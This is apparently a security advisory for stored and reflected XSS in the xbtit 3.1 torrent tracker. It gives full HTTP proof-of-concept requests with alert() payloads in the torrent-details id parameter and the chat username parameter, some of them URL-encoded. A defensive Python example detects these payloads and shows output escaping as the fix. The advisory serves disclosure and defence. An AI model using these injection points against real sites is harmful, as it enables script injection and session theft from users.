Stored & Reflected XSS affecting xbtit 3.1 and xbtitFM 3.1

Reflected XSS

The /index.php?page=torrent-details page is actually /details.php, included by index.php through the page parameter. Its id parameter (GET) is vulnerable to Reflected XSS.

The PoC uses the following XSS payload:

<img src=a onerror=alert(6*8)>

GET /xbtit/xbtit-3.1-master/index.php?page=torrent-details&id=f1fcdc1462d36530f526c1d9402eec9100b7ba18rsswr%3Cimg%20src%3da%20onerror%3dalert(6*8)%3Epbubj&rating=5&vote=Vote! HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345
Upgrade-Insecure-Requests: 1

Stored XSS

The /ajaxchat/sendChatData.php page is vulnerable to Stored XSS through the n parameter (POST).

This is the original legitimate POST request to send a message to the chat box.

POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://xbtit.local
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345

n=user&c=hello&u=6

This is the modified POST request to send a message to the chat box. The PoC XSS payload below is appended, URL encoded, to the n parameter (POST), which carries the username of the user posting the message.

<img src=a onerror=alert("XSS")>

POST /xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://xbtit.local
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php
Cookie: ajax_poller_1=1; PHPSESSID=0n4mf9l7hkfccqjc3ivj2ucd7k; uid=6; pass=e6d36bba3f1b36152182ad0093441345

n=user%3c%69%6d%67%20%73%72%63%3d%61%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%22%58%53%53%22%29%3e&c=hello&u=6
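As an added example (not part of this advisory or of the xbtit code), the following Python decodes the three requests shown above, flags the id and n parameters when they carry an HTML tag with an event-handler attribute, and shows how HTML-escaping the value at output time, the fix for both findings, renders it inert. The request records are constructed from the page, and the detection regex is a simple indicator for log review, not a complete XSS filter.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed (method, request-target, body) records modelled on the advisory's requests; headers omitted.
REQUESTS = [
    ("GET", "/xbtit/xbtit-3.1-master/index.php?page=torrent-details"
            "&id=f1fcdc1462d36530f526c1d9402eec9100b7ba18rsswr"
            "%3Cimg%20src%3da%20onerror%3dalert(6*8)%3Epbubj&rating=5&vote=Vote!", ""),
    ("POST", "/xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php", "n=user&c=hello&u=6"),
    ("POST", "/xbtit/xbtit-3.1-master/ajaxchat/sendChatData.php",
     "n=user%3c%69%6d%67%20%73%72%63%3d%61%20%6f%6e%65%72%72%6f%72%3d"
     "%61%6c%65%72%74%28%22%58%53%53%22%29%3e&c=hello&u=6"),
]

# Script -> parameters the advisory identifies as echoed without escaping.
WATCHED = {"index.php": {"id"}, "sendChatData.php": {"n"}}

# Heuristic only: an HTML tag that carries an on* event-handler attribute.
EVENT_HANDLER_TAG = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.IGNORECASE)


def suspicious_params(method, target, body=""):
    """Return (parameter, decoded value) pairs containing event-handler markup."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    raw = parts.query if method == "GET" else body
    hits = []
    for name, values in parse_qs(raw, keep_blank_values=True).items():
        if name not in WATCHED.get(script, set()):
            continue
        for value in values:
            # parse_qs decoded once; decode again so double encoding is not missed.
            decoded = unquote(value)
            if EVENT_HANDLER_TAG.search(decoded):
                hits.append((name, decoded))
    return hits


def render_safely(value):
    """The fix for both findings: HTML-escape the value before writing it into the page."""
    return html.escape(value, quote=True)


def scan(requests=REQUESTS):
    """Return (script, parameter, decoded value) for every flagged request."""
    return [(urlsplit(t).path.rsplit("/", 1)[-1], n, d)
            for m, t, b in requests for n, d in suspicious_params(m, t, b)]


for script, name, decoded in scan():
    print(f"{script}: {name}={decoded!r} -> {render_safely(decoded)}")
```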

[Vulnerability Type]
XSS stored & reflected

——————————————

[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1

——————————————

[Attack Type]
Remote – Authenticated

——————————————

[Reference]

https://github.com/btiteam/xbtit-3.1/
